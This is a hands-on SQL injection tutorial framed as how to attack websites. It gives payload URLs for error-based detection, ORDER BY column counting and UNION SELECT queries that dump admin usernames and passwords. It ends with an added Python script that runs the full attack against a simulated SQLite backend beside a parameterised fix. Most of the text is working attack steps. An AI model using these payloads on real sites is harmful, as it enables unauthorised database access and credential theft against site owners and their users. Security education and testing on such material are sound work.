Now we are going to learn how to attack sites that are vulnerable to SQL injection, so let's begin.
To check whether a site is vulnerable to SQL injection, first look at the URL. A typical candidate passes a numeric parameter to a script, like this: http://www.site.com/news.php?id=7
To test for the vulnerability, type an apostrophe at the end of the URL so it becomes: http://www.site.com/news.php?id=7'
On hitting enter, if you see this text on the page:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ...
then the parameter is being placed into a SQL query unsanitised and the website is vulnerable to this attack. The converse does not hold: if no error appears the site may still be injectable but hiding database errors (blind SQL injection), so a silent response is not proof that it is safe.
To find the number of columns in the query we use ORDER BY n, which tells the database to sort the result by its n-th column. We increment n until we get an error, because the database rejects a column position that does not exist.
http://www.site.com/news.php?id=7 order by 1 -- no error
http://www.site.com/news.php?id=7 order by 2 -- no error
http://www.site.com/news.php?id=7 order by 3 -- error
So the query has 2 columns, because we got the error on the third one.
Our next step is to check whether UNION works. With UNION we can append the rows of a second SELECT of our own to the original result, as long as our SELECT returns the same number of columns as the original query.
http://www.site.com/news.php?id=7 union all select 1,2
We stop at 2 because we discovered that the number of columns was 2, so let's move on.
If we see one of our numbers on the page, e.g. 2, the UNION works. The number also tells us which column position the page actually displays; that is the slot we will replace with the data we want to read.
This is for MySQL versions before 5: there is no information_schema database to list tables and columns, so table and column names have to be guessed. Here we guess a table named admin.
http://www.site.com/news.php?id=7 union all select 1,2 from admin
If we see the number 2 on the screen like before, the table admin exists (a non-existent table would give an error instead). Now, to check column names, we craft a query:
http://www.site.com/news.php?id=7 union all select 1,username from admin
If the username is displayed on screen in the slot where the 2 was, the column exists.
Now to check for the column password:
http://www.site.com/news.php?id=7 union all select 1,password from admin
If we are successful, we will see the password on the screen. It can be plain text or a hash, depending on how the application stores it. Now we want both values at once, and only one column is displayed, so we use the concat() function (it joins strings together):
http://www.site.com/news.php?id=7 union all select 1,concat(username,0x3a,password) from admin
Note that 0x3a is the hex value for a colon. MySQL accepts hex literals as strings, which lets us insert the separator without typing a quote character in the URL.
Now we get username:password displayed on screen.
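Added example, not from the original page: the whole procedure above run end to end in Python against a constructed in-memory SQLite database that stands in for the site's MySQL backend. news.php is simulated by a hypothetical function news_vulnerable() that concatenates the id parameter into the query, with a parameterised news_safe() beside it to show the fix. The table admin, the news row and the password hash are made-up sample data, and because SQLite has no concat() and no 0x3a hex string literal, the last step uses || and char(58) instead.

```python
import sqlite3

# Constructed stand-in for the tutorial's backend: an in-memory SQLite database
# (the page targets MySQL; the attack logic is the same, only the concat syntax
# differs, see dump_credentials below). All rows are made up for the demo.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO news VALUES (7, 'Release notes', 'Version 2 shipped.');
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO admin VALUES ('root', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return con


def news_vulnerable(con, id_param):
    """Hypothetical news.php: the id parameter is pasted straight into the SQL.
    The query selects two columns but the page renders only the body (column 2),
    which is why a UNION marker row shows up as '2' and not '1'."""
    sql = "SELECT title, body FROM news WHERE id=" + str(id_param)
    return [str(row[1]) for row in con.execute(sql)]


def news_safe(con, id_param):
    """Hardened version: the value is bound as a parameter, so whatever the
    attacker sends is compared against id and can never become SQL."""
    rows = con.execute("SELECT title, body FROM news WHERE id=?", (id_param,))
    return [str(row[1]) for row in rows]


def is_injectable(con, view):
    """The tutorial's apostrophe test: id=7' breaks the query and the database
    raises a syntax error. An error proves injection; a missing error does not
    prove safety (the application may be hiding it, i.e. blind injection)."""
    try:
        view(con, "7'")
    except sqlite3.Error:
        return True
    return False


def count_columns(con, view, max_cols=20):
    """ORDER BY 1, 2, 3 ... until the database rejects the column position."""
    for n in range(1, max_cols + 1):
        try:
            view(con, f"7 ORDER BY {n}")
        except sqlite3.Error:
            return n - 1
    return None  # gave up: more columns than max_cols, or errors are hidden


def echoed_positions(con, view, ncols):
    """UNION ALL SELECT 1,2,...,n: the marker numbers that appear on the page
    are the column positions the application renders."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    page = view(con, f"7 UNION ALL SELECT {markers}")
    return [i for i in range(1, ncols + 1) if str(i) in page]


def dump_credentials(con, view, ncols, pos):
    """Put username:password from the guessed table into the echoed slot.
    MySQL: concat(username,0x3a,password). SQLite has no concat() and no 0x..
    string literal, so '||' and char(58) do the same job without a quote."""
    cols = ["1"] * ncols
    cols[pos - 1] = "username || char(58) || password"
    page = view(con, f"7 UNION ALL SELECT {','.join(cols)} FROM admin")
    baseline = view(con, "7")  # what the page normally shows for id=7
    return [line for line in page if line not in baseline]


def run_demo():
    con = build_db()
    ncols = count_columns(con, news_vulnerable)           # 2
    pos = echoed_positions(con, news_vulnerable, ncols)   # [2]
    creds = dump_credentials(con, news_vulnerable, ncols, pos[0])
    # The same payload against the parameterised query matches no row at all.
    blocked = news_safe(con, "7 UNION ALL SELECT 1, username FROM admin")
    return ncols, pos, creds, blocked


if __name__ == "__main__":
    print(run_demo())
```

run_demo() returns the column count, the echoed column position, the dumped username:password line and the empty result the hardened query gives for the same payload. The baseline comparison in dump_credentials is the general form of "look for the new line on the page": it works whatever the page normally shows, not just when the injected row is the only one containing a colon.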